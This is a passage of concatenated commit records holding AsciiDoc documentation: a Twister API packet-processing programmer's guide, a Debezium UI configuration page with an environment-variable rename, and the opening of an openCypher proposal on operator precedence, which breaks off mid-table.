*tw<X>* according to the PCI ID in a numerical order. So if a TVM has two ports, the port name for first one will be tw0 and for the second one will be tw1.\r\n* ip_addrs: This field lists the IP address range to be assigned for the port. It contains two sub fields:\r\na. start_ip_addr: IP address in string format, assigned to the port.\r\nb. num_ip_addrs: This number specify the range of IP addresses for this port.\r\nc. gateway_ip: It will list the gateway for this particular port.\r\nd. subnet_mask: The mask to determine the subnet of this port. \r\n*For an application using multiple ports e.g. 2, the format of port_conf would be i.e. \r\n[\r\n [\r\n port_name:tw0\r\n\tip_addrs:[]\r\n ],\r\n [\r\n port_name:tw1\r\n\tip_addrs:[]\r\n ]\r\n] \r\n\r\n\r\n== Event loop\r\nTwister API provides an event loop which is based on *libuv* model with general flow shown below:\r\n\r\n\r\nThe Twister API implementation of event loop has the following features:\r\n1. Event callback registration: Users can register three types of handles in the loop. \r\n* RX handle: These handles are used for receiving packets. Currently only one RX handle is supported. This callback is called when any type of packet is received.\r\n* TX handle: Multiple TX handles can be registered. Each handles callback will be called once per event loop iteration.\r\n* Timer handle: This handles callback will be called after a fixed timeout.\r\n2. With each instance of a handle, one callback function is registered. This is called when the event has occurred.\r\n\r\n=== Comparison of twister API calls and Libuv calls are given below:\r\n\r\nSr.\r Twister\rLibuv\r1.\rtw_default_loop: Reserve memory for an event loop with which handles can be registered. The loops total time to run is also provided\ruv_default_loop: Reserve memory for an\r\nevent loop with which handles can be\r\nregistered\r2.\rtw_<handlename>_init: Reserve memory for handle pointer and register it with an event loop instance\ruv_<handlename>_init: Reserve memory for handle pointer and register it with an event loop instance\r3.\rtw_<handlename>_start: Register a callback function for the handle\ruv_<handlename_start>: Register a callback function for the handle\r4.\rtw_run: Start the event loop\ruv_run: Start the event loop\r\r\n\r\n== ARP Table\r\nThe Twister API has built-in ARP functionality which user can utilize in their application using simple calls. The API will maintain the table locally. If application is sending a packet whose MAC is not known, the API will store the packet in the queue and generate an ARP query for the IP and automatically update the queued packets once the ARP respond is received.\r\nThe API can also respond to the ARP query for the IP addresses of the interfaces which the API is handling. The application programmer just has to add the tw_arp_parser in the application flow. Rest will be the job of the API. To list all the ARP functions and their usage, kindly use the Twister API Reference documentation provided on Github. It can be accessed the twister\/documentation\/html\/index.html file.\r\n\r\n\r\n\r\n\r\n== Building the Applications\r\nCloning the Repository\r\n\r\nClone the desired branch from dell twister repository (https:\/\/github.com\/delltwister\/twister). Navigate to the directory of desired example. \r\n\r\n=== Compiling a Sample Application\r\nThe sample applications can be built using the following commands:\r\n--------------------------------------\r\n\tmake clean\r\n\tmake\r\n--------------------------------------\r\n=== Customizing the Application Makefile\r\nThe default Makefile provided with the UDP Echo sample application is a good starting point. It includes:\r\n* twister.mk at the beginning\r\nThe user must define following variables:\r\n* APP: Contains the name of the application.\r\n* SRCS: List of source files (*.c).\r\nThe rest of the Makefile can be customized as a normal Makefile.\r\n\r\n\r\n\r\n== Sample Applications Details\r\nThe general flow of Twister API applications is as follows:\r\n\r\nThere are three sample applications developed for Twister API release 0.1. They include the following:\r\n1. UDP Send Application: This application is a tester client application which generates UDP traffic by sending timestamp to an echo server. It also receives any timestamps echoed back and calculates RTT.\r\n2. UDP Echo Application: This application receives the UDP traffic and echo back to the sender.\r\n3. Ethernet Echo Application: This application is a simple Layer 2 forward application which simply echo every packet it received by changing the MAC.\r\nThe UDP Echo server application is discussed below:\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n== Writing a New Application\r\nThe best way to start writing a new application is to copy an existing Twister API application and modify it. To list the functions and their usage, kindly use the Twister API Reference documentation provided on GitHub. It can be accessed from twister\/documentation\/html\/index.html file. \r\n\r\n\r\n\r\n\r\n== Appendices\r\n\r\nHW\/SW Information Relating to Twister API\r\nIntel DPDK Version: 2.0.0\r\nLinux Kernel Version: 3.11.0-12-generic\t\r\nLinux Version: Ubuntu 12.04\r\nTwister VM Architecture: x86_64\r\nCPU Model: Intel Xeon E312xx (Sandy Bridge)\r\nGCC Version: 4.8.1\r\nIntel NICs Used for testing purposes: Virtual Functions of Intel x520 and x540 Dual Port 10G NICs\r\n\r\n\r\n \r\n\r\n","old_contents":"=TWISTER APPLICATION PROGRAMMERS GUIDE\r\n:docinfo:\r\n[preface]\r\n== Introduction\r\nThis document gives an overview of the modules build in Twister API and how an application is built on it. The detailed definitions and individual function calls can be found in the doc folder of Twister API. \r\nAt start, the document explains the core modules of twister API, these include initialization module, event loop, ARP table management and JSON parsing. Details of build system are also included.\r\nAfter that, it explains the sample application step by step to give programmer an example of API usage. The Appendices contain information to debug any relevant issues. \r\nThe best way to start is to go through the Sample Applications Details Section initially while reviewing the code of the sample application and then go through the whole document for complete understanding of design of Twister API and application development on top of it. \r\n\r\n\r\n\r\nInitialization Module\r\nThe initialization module of API handles the initialization of twister abstraction layer. Abstraction layer consists of the following parts:\r\n* System Memory Reservation: The abstraction layer facilitates the reservation of different memory zones, for example, physical memory areas for device interactions.\r\n* Allocate PCI resources and set up the physical device and the link\r\n* Initialize statistics counters\r\n* Link Up\/Down control and notification interrupt. This is the only interrupt that a PMD handles\r\n* Port and Queue setup for both RX and TX\r\n* Access the RX and TX descriptors directly without any interrupts\r\n* Assign user specified parameters to the physical device.\r\nIn the Twister API, all the above initialization steps are formed by single API call which is:\r\ntw_init_global(argc, argv)\r\nThe user specified parameters for the physical device are provided in the port_conf file. This file must be present in the application directory. The parameters are further explained in the below section:\r\n\r\nPort Management \r\nThe port management is assigning specific parameters which include IP address, subnet mask, gateway IP to the port. All this is done in the initialization module. The user just hast to provide a file to the module, which is port_conf. The configuration file should be in JSON format and a sample is provided below:\r\n\r\nport_conf file is array of JSON fields. Each array [port_name: <>, ip_addrs:<>] corresponds to one port:\r\n* port_name: This is an identifier that lists the port name. The port name is assigned by Twister Virtual Machine (TVM)OS. TVM assigns the port name as tw<X> according to the PCI ID in a numerical order. So if a TVM has two ports, the port name for first one will be tw0 and for the second one will be tw1.\r\n* ip_addrs: This field lists the IP address range to be assigned for the port. It contains two sub fields:\r\na. start_ip_addr: IP address in string format, assigned to the port.\r\nb. num_ip_addrs: This number specify the range of IP addresses for this port.\r\nc. gateway_ip: It will list the gateway for this particular port.\r\nd. subnet_mask: The mask to determine the subnet of this port. \r\n*For an application using multiple ports e.g. 2, the format of port_conf would be i.e. \r\n[\r\n [\r\n port_name:tw0\r\n\tip_addrs:[]\r\n ],\r\n [\r\n port_name:tw1\r\n\tip_addrs:[]\r\n ]\r\n] \r\n\r\n\r\n==Event loop\r\nTwister API provides an event loop which is based on libuv model with general flow shown below:\r\n\r\n\r\nThe Twister API implementation of event loop has the following features:\r\n1. Event callback registration: Users can register three types of handles in the loop. \r\n* RX handle: These handles are used for receiving packets. Currently only one RX handle is supported. This callback is called when any type of packet is received.\r\n* TX handle: Multiple TX handles can be registered. Each handles callback will be called once per event loop iteration.\r\n* Timer handle: This handles callback will be called after a fixed timeout.\r\n2. With each instance of a handle, one callback function is registered. This is called when the event has occurred.\r\n\r\n===Comparison of twister API calls and Libuv calls are given below:\r\n\r\nSr.\r Twister\rLibuv\r1.\rtw_default_loop: Reserve memory for an event loop with which handles can be registered. The loops total time to run is also provided\ruv_default_loop: Reserve memory for an\r\nevent loop with which handles can be\r\nregistered\r2.\rtw_<handlename>_init: Reserve memory for handle pointer and register it with an event loop instance\ruv_<handlename>_init: Reserve memory for handle pointer and register it with an event loop instance\r3.\rtw_<handlename>_start: Register a callback function for the handle\ruv_<handlename_start>: Register a callback function for the handle\r4.\rtw_run: Start the event loop\ruv_run: Start the event loop\r\r\n\r\n== ARP Table\r\nThe Twister API has built-in ARP functionality which user can utilize in their application using simple calls. The API will maintain the table locally. If application is sending a packet whose MAC is not known, the API will store the packet in the queue and generate an ARP query for the IP and automatically update the queued packets once the ARP respond is received.\r\nThe API can also respond to the ARP query for the IP addresses of the interfaces which the API is handling. The application programmer just has to add the tw_arp_parser in the application flow. Rest will be the job of the API. To list all the ARP functions and their usage, kindly use the Twister API Reference documentation provided on Github. It can be accessed the twister\/documentation\/html\/index.html file.\r\n\r\n\r\n\r\n\r\n==Building the Applications\r\nCloning the Repository\r\n\r\nClone the desired branch from dell twister repository (https:\/\/github.com\/delltwister\/twister). Navigate to the directory of desired example. \r\n\r\n===Compiling a Sample Application\r\nThe sample applications can be built using the following commands:\r\n % make clean\r\n %make\r\n===Customizing the Application Makefile\r\nThe default Makefile provided with the UDP Echo sample application is a good starting point. It includes:\r\n* twister.mk at the beginning\r\nThe user must define following variables:\r\n* APP: Contains the name of the application.\r\n* SRCS: List of source files (*.c).\r\nThe rest of the Makefile can be customized as a normal Makefile.\r\n\r\n\r\n\r\n==Sample Applications Details\r\nThe general flow of Twister API applications is as follows:\r\n\r\nThere are three sample applications developed for Twister API release 0.1. They include the following:\r\n1. UDP Send Application: This application is a tester client application which generates UDP traffic by sending timestamp to an echo server. It also receives any timestamps echoed back and calculates RTT.\r\n2. UDP Echo Application: This application receives the UDP traffic and echo back to the sender.\r\n3. Ethernet Echo Application: This application is a simple Layer 2 forward application which simply echo every packet it received by changing the MAC.\r\nThe UDP Echo server application is discussed below:\r\n\r\n\r\n\r\n===UDP Echo Server\r\nThe UDP Echo server step by step explanation is below: \r\n tw_init_global() Initialize the global environment for twister application by configuring ports and engines available on machine.\r\n\r\n tw_map_port_to_engine(): binds the a NIC port to a specific engine. So all the incoming\/outgoing traffic on that port (tw<x>) will be managed by the engine (engine<x>). The description of port and engines is describe below.\r\no A port-name (that could be tw0, tw1, depending upon the number of available ports on the machine)\r\no An engine-name (engine0, engine1, depends on the number of available engines on the machine)\r\n\r\n In user_app_main(), the main logic of UDP ECHO application resides. Since this application only echoes back the incoming packets, we have to create a callback function which fires every time a packet arrives.\r\n tw_rx_t * server; is a pointer to callback struct that configures the rx_callback. struct tw_rx_s { \r\n \t uint8_t handle_type; \r\n uint64_t last_run_time; \r\n int sock_fd; \r\n struct tw_sockaddr_in * addr; \r\n uint8_t flags; \r\n void * recv_cb; \r\n struct tw_rx_s * next; \r\n};\r\no handle_type tells which callback does that corresponds. Since it is a receive callback function. So we set its value to RX_CALLBACK. Currently we support only three types of callback functions, RX_CALLBACK, TX_CALLBACK, TIMER_CALLBACK.\r\no last_run_time tells when was the last time this event was fired. Each time a packet arrives, timestamp to this variables would be updated. For the first-time we set it to 0.\r\no recv_cb is a pointer to functions that will be executed each time receive event will occur. Our callback function is replay_payload so we set this pointer to function reply_payload. Every-time we receive a packet, the reply_payload function is called. In this function, the user can implement any RX logic. In our case, we echo the timestamp in the payload and send the UDP packet back to client.\r\n tw_default_loop(INFINITE_LOOP); creates an infinite eventloop handler and its address is returned as pointer. tw_default_loop() takes argument in seconds and run the event loop for that time. A value of 0 will make it run infinitely. The INFINITE_LOOP parameter has a value 0. This event-loop handler is described below:\r\nstruct tw_loop_s { \r\n void* data; \r\n uint8_t active_handles*-; \r\n struct tw_rx_s * rx_handle_queue; \r\n struct tw_tx_s * tx_handle_queue; \r\n struct tw_timer_s * timer_handle_queue;\r\n unsigned int stop_flag;\r\n uint16_t secs_to_run; \r\n};\r\no data: user_data this could be used for any data\/functions user want to use for this event-loop. \r\no active_handles: number of active handles currently this event-loop is managing. This could be multiple Rx, Tx, and timer handles. Twister main event-loop uses this. User dont need to deal with it.\r\no rx_handle_queue: a link-list for all the Rx handlers.\r\no tx_handle_queue: a link-list for all the Rx handlers.\r\no imer_handle_queue: a link-list for all the timer handlers.\r\no stop_flag: flag is raised when event-loop timer expires.\r\no secs_to_run: number of seconds for which this event-loop would be run.\r\n tw_rx_init(tw_loop); would add an Rx handler to event-loop(tw_loop) and return the pointer to new handler added to rx_handle_queue of event-loop.tw_run(tw_loop);\r\n tw_rx_start(server, reply_payload); would assign the receive call back function to receive handler. So everytime receive event occurs i.e., a packet is received, the call back function assigned to the handler would be executed. It takes two arguments:\r\no server: a pointer to receive handler of type tw_rx_s.\r\no reply_payload: A receive callback function.\r\n tw_run(tw_loop); takes a configured event-loop handler and execute it for whatever time the user has configured it.\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n==Writing a New Application\r\nThe best way to start writing a new application is to copy an existing Twister API application and modify it. To list the functions and their usage, kindly use the Twister API Reference documentation provided on GitHub. It can be accessed from twister\/documentation\/html\/index.html file. \r\n\r\n\r\n\r\n\r\n==Appendices\r\n\r\nHW\/SW Information Relating to Twister API\r\nIntel DPDK Version: 2.0.0\r\nLinux Kernel Version: 3.11.0-12-generic\t\r\nLinux Version: Ubuntu 12.04\r\nTwister VM Architecture: x86_64\r\nCPU Model: Intel Xeon E312xx (Sandy Bridge)\r\nGCC Version: 4.8.1\r\nIntel NICs Used for testing purposes: Virtual Functions of Intel x520 and x540 Dual Port 10G NICs\r\n\r\n\r\n \r\n\r\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a41aa4bafdea0b66b2f9cbfcfa57e0e80b10952","subject":"[docs] Adjusting var name in UI docs","message":"[docs] Adjusting var name in UI docs\n\n","repos":"debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/operations\/debezium-ui.adoc","new_file":"documentation\/modules\/ROOT\/pages\/operations\/debezium-ui.adoc","new_contents":"[id=\"debezium-ui\"]\n= {prodname} UI\n\n:linkattrs:\n:icons: font\n:toc:\n:toclevels: 3\n:toc-placement: macro\n\ntoc::[]\n\n[NOTE]\n====\nThis feature is currently in incubating state, i.e. exact semantics and behaviours etc. may change in future revisions, based on the feedback we receive.\nPlease let us know about your feature requests or if you encounter any problems while using the {prodname} UI.\n====\n\nThe {prodname} UI allows users to set up and operate connectors more easily. For instance, a list of all connectors can be viewed along with their status, etc. The Create Connector wizard allows the user to configure connectors, guiding and validating the property entries along the way.\n\n== Design Considerations\n\nThe UI is implemented as a https:\/\/quarkus.io\/[Quarkus]-based web application. The backend is configured with the URL(s) of one or more Kafka Connect clusters and provides a REST interface for the frontend. The frontend user interface uses https:\/\/reactjs.org\/[ReactJS] as the primary technology, utilizing https:\/\/www.patternfly.org\/v4\/[Patternfly] react components and design patterns.\n\n== Installation and Configuration\n\n\n=== Configure the Debezium UI\nThe following table shows the environment variables for the https:\/\/hub.docker.com\/r\/debezium\/debezium-ui[Debezium UI container image] and the related parameter names inside `application.properties` when running the Java application without the container.\n\n[cols=\"1,2,2,2,6\",options=\"header\"]\n\n|===\n|Item |Environment variable |Parameter name in application.properties |Default value |Description\n\n|1\n|DEPLOYMENT_MODE[[DEPLOYMENT_MODE]]\n|`deployment.mode`\n|default\n|Specifies how the Debezium UI is deployed. +\n +\nFor example, in some environments it might not be possible to reach the underlying backend, Kafka Connect REST interface or databases, then the link:#DEPLOYMENT_MODE[deployment mode] can be switched to match the underlying infrastructure. +\n +\n`default` The default deployment mode. It uses the Debezium UI backend with the configured Kafka Connect clusters via the Kafka Connect REST interface (see link:#KAFKA_CONNECT_URIS[KAFKA_CONNECT_URIS] how they are configured). +\n +\n +\n`validation.disabled` When set to validation.disabled the UI frontend will not call the backend to validate the user input nor check the availability and proper configuration of database connections. That mode is used to only generate the Debezium connector JSON configuration without the UI backend validation. +\n +\n|2\n|KAFKA_CONNECT_URIS[[KAFKA_CONNECT_URIS]]\n|`kafka.connect.uris`\n|http:\/\/connect:8083\n|A comma-separated list to one or more URLs of Kafka Connect REST interfaces to specify the Kafka Connect clusters that should be managed by the Debezium UI.\n\n|===\n\n=== Debezium UI container image\n\nThe Debezium UI https:\/\/hub.docker.com\/r\/debezium\/debezium-ui[container image] is available for running the UI. To start the UI and connect to an existing Kafka Connect instance via Docker (where KAFKA_CONNECT_URIS supplies the comma-separated list of available URI(s)):\n\n----\n$ docker run -it --rm --name debezium-ui -p 8080:8080 -e KAFKA_CONNECT_URIS=http:\/\/connect:8083 debezium\/debezium-ui:{debezium-version}\n----\n\nThe UI connects to Kafka Connect via REST, so you need to make sure that the latter is reachable, e.g. by running both components on the same Docker network.\n\n[NOTE]\n====\nCurrently, the UI connects to un-authenticated Kafka Connect instances. Also, there's no authorization or authentication implemented in the UI itself yet. Until that is the case, you should secure the components e.g. with your own proxy for authorization, if needed.\n====\n\n\n=== Self-contained example\n\nA self-contained example https:\/\/github.com\/debezium\/debezium-examples\/tree\/main\/ui-demo[ui-demo] is available, which is included under https:\/\/github.com\/debezium\/debezium-examples[debezium-examples] on Github. The ui-demo includes a docker-compose file which brings up several sources with data as well as the UI. Please refer to the https:\/\/github.com\/debezium\/debezium-examples\/tree\/main\/ui-demo[README file] for more details on running the Debezium ui-demo.\n\n== UI Operation\n\n=== UI Connector List\nThe main page of the UI displays all the registered connectors. Some of the highlights of the main page are as follows:\n\n* *Kafka connect cluster* can be selected via the dropdown in the header.\n* Connector table shows each connector with it's type (MySQL, PostgreSQL, MongoDB), connector status and connector tasks.\n* A connector row can be expanded to show more details, as shown below with the 'testPostgres' connector. Metrics are shown in the expansion area (*Note:* this feature is still under development and not functional yet). Connector tasks are shown, with ability to *Restart* the task if desired.\n* The kebab menu at the right of each connector row provides actions which allow the user to *Pause, Resume, Restart or Delete* the connector.\n\nimage::debezium-ui-connectors-list.png[{prodname} UI connectors]\n\n=== UI Create Connector Wizard\nThe user can create a connector by clicking on the *Create a connector* button on the main page. The first two steps of the wizard are required, but the remaining steps are optional. Each step will validate the user entries and provide feedback if there are problems. After completing steps 1 and 2 successfully, the user can proceed to the final page to review and create the connector.\n\n==== Create Connector - Connector type (required)\nChoose the type of connector in step 1. Currently the *MongoDB, MySQL and PostgreSQL* connector types are supported. Addition of more connector types is currently in progress.\n\nimage::debezium-ui-create-connector-step1.png[{prodname} UI Create connector step1]\n\n==== Create Connector - Properties (required)\nThe basic connection properties for the selected connector are entered in step 2, and the properties must be validated before proceeding. Advanced connection properties are also provided in a separate section of this step. Upon successful validation, the user may proceed to the next steps (Additional properties) - or they can elect to bypass the additional properties and proceed directly to Review.\n\nimage::debezium-ui-create-connector-step2.png[{prodname} UI Create connector step2]\n\n==== Create Connector - Additional properties (optional)\nThe Additional properties are optional and can be summarized as follows:\n\n* *Filter definition* - entry of *regular expressions* which define the filters for inclusion\/exclusion of the items that will be included for CDC. The included items are displayed as the filters are entered and applied.\n* *Data options* - *Snapshot* and *Mapping* properties (optional). The defaults can be viewed and changed if desired.\n* *Runtime options* - *Engine* and *Heartbeat* properties (optional). The defaults can be viewed and changed if desired.\n\n==== Create Connector - Review\nThe *Review* step provides a summary of the configuration that will be used to create the connector. If happy with the selections, click 'Finish' to create the connector. If the properties need adjustment, navigate back to the earlier steps.\n\nimage::debezium-ui-create-connector-review.png[{prodname} UI Create connector review]\n","old_contents":"[id=\"debezium-ui\"]\n= {prodname} UI\n\n:linkattrs:\n:icons: font\n:toc:\n:toclevels: 3\n:toc-placement: macro\n\ntoc::[]\n\n[NOTE]\n====\nThis feature is currently in incubating state, i.e. exact semantics and behaviours etc. may change in future revisions, based on the feedback we receive.\nPlease let us know about your feature requests or if you encounter any problems while using the {prodname} UI.\n====\n\nThe {prodname} UI allows users to set up and operate connectors more easily. For instance, a list of all connectors can be viewed along with their status, etc. The Create Connector wizard allows the user to configure connectors, guiding and validating the property entries along the way.\n\n== Design Considerations\n\nThe UI is implemented as a https:\/\/quarkus.io\/[Quarkus]-based web application. The backend is configured with the URL(s) of one or more Kafka Connect clusters and provides a REST interface for the frontend. The frontend user interface uses https:\/\/reactjs.org\/[ReactJS] as the primary technology, utilizing https:\/\/www.patternfly.org\/v4\/[Patternfly] react components and design patterns.\n\n== Installation and Configuration\n\n\n=== Configure the Debezium UI\nThe following table shows the environment variables for the https:\/\/hub.docker.com\/r\/debezium\/debezium-ui[Debezium UI container image] and the related parameter names inside `application.properties` when running the Java application without the container.\n\n[cols=\"1,2,2,2,6\",options=\"header\"]\n\n|===\n|Item |Environment variable |Parameter name in application.properties |Default value |Description\n\n|1\n|DEPLOYMENT_MODE[[DEPLOYMENT_MODE]]\n|`deployment.mode`\n|default\n|Specifies how the Debezium UI is deployed. +\n +\nFor example, in some environments it might not be possible to reach the underlying backend, Kafka Connect REST interface or databases, then the link:#DEPLOYMENT_MODE[deployment mode] can be switched to match the underlying infrastructure. +\n +\n`default` The default deployment mode. It uses the Debezium UI backend with the configured Kafka Connect clusters via the Kafka Connect REST interface (see link:#KAFKA_CONNECT_URI[KAFKA_CONNECT_URI] how they are configured). +\n +\n +\n`validation.disabled` When set to validation.disabled the UI frontend will not call the backend to validate the user input nor check the availability and proper configuration of database connections. That mode is used to only generate the Debezium connector JSON configuration without the UI backend validation. +\n +\n|2\n|KAFKA_CONNECT_URI[[KAFKA_CONNECT_URI]]\n|`kafka.connect.uri`\n|http:\/\/connect:8083\n|A comma-separated list to one or more URLs of Kafka Connect REST interfaces to specify the Kafka Connect clusters that should be managed by the Debezium UI.\n\n|===\n\n=== Debezium UI container image\n\nThe Debezium UI https:\/\/hub.docker.com\/r\/debezium\/debezium-ui[container image] is available for running the UI. To start the UI and connect to an existing Kafka Connect instance via Docker (where KAFKA_CONNECT_URI supplies the comma-separated list of available URI(s)):\n\n----\n$ docker run -it --rm --name debezium-ui -p 8080:8080 -e KAFKA_CONNECT_URI=http:\/\/connect:8083 debezium\/debezium-ui:{debezium-version}\n----\n\nThe UI connects to Kafka Connect via REST, so you need to make sure that the latter is reachable, e.g. by running both components on the same Docker network.\n\n[NOTE]\n====\nCurrently, the UI connects to un-authenticated Kafka Connect instances. Also, there's no authorization or authentication implemented in the UI itself yet. Until that is the case, you should secure the components e.g. with your own proxy for authorization, if needed.\n====\n\n\n=== Self-contained example\n\nA self-contained example https:\/\/github.com\/debezium\/debezium-examples\/tree\/main\/ui-demo[ui-demo] is available, which is included under https:\/\/github.com\/debezium\/debezium-examples[debezium-examples] on Github. The ui-demo includes a docker-compose file which brings up several sources with data as well as the UI. Please refer to the https:\/\/github.com\/debezium\/debezium-examples\/tree\/main\/ui-demo[README file] for more details on running the Debezium ui-demo.\n\n== UI Operation\n\n=== UI Connector List\nThe main page of the UI displays all the registered connectors. Some of the highlights of the main page are as follows:\n\n* *Kafka connect cluster* can be selected via the dropdown in the header.\n* Connector table shows each connector with it's type (MySQL, PostgreSQL, MongoDB), connector status and connector tasks.\n* A connector row can be expanded to show more details, as shown below with the 'testPostgres' connector. Metrics are shown in the expansion area (*Note:* this feature is still under development and not functional yet). Connector tasks are shown, with ability to *Restart* the task if desired.\n* The kebab menu at the right of each connector row provides actions which allow the user to *Pause, Resume, Restart or Delete* the connector.\n\nimage::debezium-ui-connectors-list.png[{prodname} UI connectors]\n\n=== UI Create Connector Wizard\nThe user can create a connector by clicking on the *Create a connector* button on the main page. The first two steps of the wizard are required, but the remaining steps are optional. Each step will validate the user entries and provide feedback if there are problems. After completing steps 1 and 2 successfully, the user can proceed to the final page to review and create the connector.\n\n==== Create Connector - Connector type (required)\nChoose the type of connector in step 1. Currently the *MongoDB, MySQL and PostgreSQL* connector types are supported. Addition of more connector types is currently in progress.\n\nimage::debezium-ui-create-connector-step1.png[{prodname} UI Create connector step1]\n\n==== Create Connector - Properties (required)\nThe basic connection properties for the selected connector are entered in step 2, and the properties must be validated before proceeding. Advanced connection properties are also provided in a separate section of this step. Upon successful validation, the user may proceed to the next steps (Additional properties) - or they can elect to bypass the additional properties and proceed directly to Review.\n\nimage::debezium-ui-create-connector-step2.png[{prodname} UI Create connector step2]\n\n==== Create Connector - Additional properties (optional)\nThe Additional properties are optional and can be summarized as follows:\n\n* *Filter definition* - entry of *regular expressions* which define the filters for inclusion\/exclusion of the items that will be included for CDC. The included items are displayed as the filters are entered and applied.\n* *Data options* - *Snapshot* and *Mapping* properties (optional). The defaults can be viewed and changed if desired.\n* *Runtime options* - *Engine* and *Heartbeat* properties (optional). The defaults can be viewed and changed if desired.\n\n==== Create Connector - Review\nThe *Review* step provides a summary of the configuration that will be used to create the connector. If happy with the selections, click 'Finish' to create the connector. If the properties need adjustment, navigate back to the earlier steps.\n\nimage::debezium-ui-create-connector-review.png[{prodname} UI Create connector review]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"41fd46ea175435c533df2d861f12628a08908c19","subject":"Fix typo","message":"Fix typo","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2021-08-10-Operator-precedence.adoc","new_file":"cip\/1.accepted\/CIP2021-08-10-Operator-precedence.adoc","new_contents":"= CIP2021-08-10 Operator precedence\n:numbered:\n:toc:\n:toc-placement: macro\n:source-highlighter: codemirror\n\n*Authors:* Hannes Voigt <hannes.voigt@neo4j.com>\n\n\n[abstract]\n.Abstract\n--\nThis CIP defines the operator precedence rules of openCypher.\n--\n\ntoc::[]\n\n== Background\n\nThe expression sub-languages of openCypher (and most other query and programming languages) allow very liberal composition of different elementary expressions into complex expressions through nesting.\nElementary expression the kinds of expressions the expression sub-languages provides and which for the building blocks of the sub-languages.\n\nSome elementary expressions have zero operands, e.g. literals.\nMost elementary expressions have one or more operands.\nFor instance,\n\n- An arithmetic negation has one operand,\n- A boolean conjunction has two operands,\n- A property access has two operands -- an element and a property key,\n- A function call has two operands -- a function name and an arguments list,\n- A list comprehension has three or four operands -- an element variable name, a list, a predicate, and optionally a projection expression\n- A case expression has multiple operands -- a value to test, for every case a test value\/predicate and a result value, and a default value of the 'else' case\n\nSome operands expect non-values, typically identifiers (variable names, function names, property keys, etc.).\nSuch _non-value operands_ do not allow nesting of expressions because expression only result in values.\n\nHowever, most operands expect values of some types.\nSuch _value operands_ allow nesting of all expressions that result in a values of the expected type.\nThe nested expressions form an _operator tree_ and which typically evaluated bottom-up, i.e. all expressions that provide an operand are evaluated before the expression is evaluated that take this operands.\n(Higher-order expression, e.g. list comprehensions, have operands which are exceptions to this bottom-up evaluation.)\nIn other words, the operator tree encodes the evaluation order.\nFor instance, the following operator tree\n----\n *\n \/ \\\n + 4\n \/ \\\n3 2\n----\nencodes that the numeric addition is evaluated before the numeric multiplication, so that the expression results in `20`.\n\nHowever, the query string is a sequence of characters and not a tree.\nThe parser turns the query string into such an operator tree.\nIn the query string, nesting can clearly be denoted by parentheses.\nFor instance, the query string\n----\n((3+2)*4)\n----\nallows a parser to unambiguously construct the operator tree shown above.\n\nFor user convenience, better readability, and familiarity with common conventions in mathematical notation, openCypher (and most other query and programming languages) allows omitting the parentheses.\nFor instance,\n----\n3+2*4\n----\nis also a valid expression.\n\nWithout additional rules, however, it is not possible to unambiguously construct a operator tree for such an expression.\nIn the particular case, two operator trees are possible:\n\n- `((3+2)*4)`\n- `(3+(2*4))`\n\nTo avoid this kind of ambiguity, openCypher (and most other query and programming languages) has _precedence rules_.\n\nPrecedence rules (or _rules of operator precedence_) define the order in which the different operators, i.e. the different kinds of expressions, are evaluated.\nFor instance, numeric multiplication is evaluated before numeric addition, such that expression\n----\n3+2*4\n----\nis effectively evaluated as\n----\n(3+(2*4))\n----\nand, hence, results in `11` (rather than `20`).\n\nThis CIP states the precedence rules of openCypher.\n\n== Proposal\n\nThe precedence in openCypher is defined by (1) _precedence levels_ and (2) _operator associativity_.\nBoth are defined in the following two subsections.\n\n=== Precedence levels\n\nThe following <<precedenceLevels,table>> lists the precedence levels in descending order.\n\n.[[precedenceLevels]]Precedence levels\n[cols=\"<.<1a,<.<4a,<.<4a\", options=\"header\"]\n|===\n|Level |Group |Operators\n\n|12\n|Atoms\n|\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Literal[Literals]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Variable[Variables]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Parameter[Parameters]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=CaseExpression[Case expressions]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ListComprehension[List comprehensions]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PatternComprehension[Pattern comprehensions]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Reduce[Reduce operator]\n* quantifiers\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=RelationshipsPattern[Pattern predicates]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ParenthesizedExpression[Function invocations]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ParenthesizedExpression[Existential subqueries]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ParenthesizedExpression[Parenthesized expression]\n\n|11\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PropertyOrLabelsExpression[Graph element operators]\n|\n\n* property lookup\n* label expressions\n\n.3+|10\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=StringOperatorExpression[String operators] (left-hand operand)\n|\n\n* Prefix predicate (and right-hand operand)\n* Suffix predicate (and right-hand operand)\n* Contains predicate (and right-hand operand)\n* Regular expression predicate\n\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ListOperatorExpression[List operators] (left-hand operand)\n|\n\n* List element containment predicate (and right-hand operand)\n* List element access\n* List 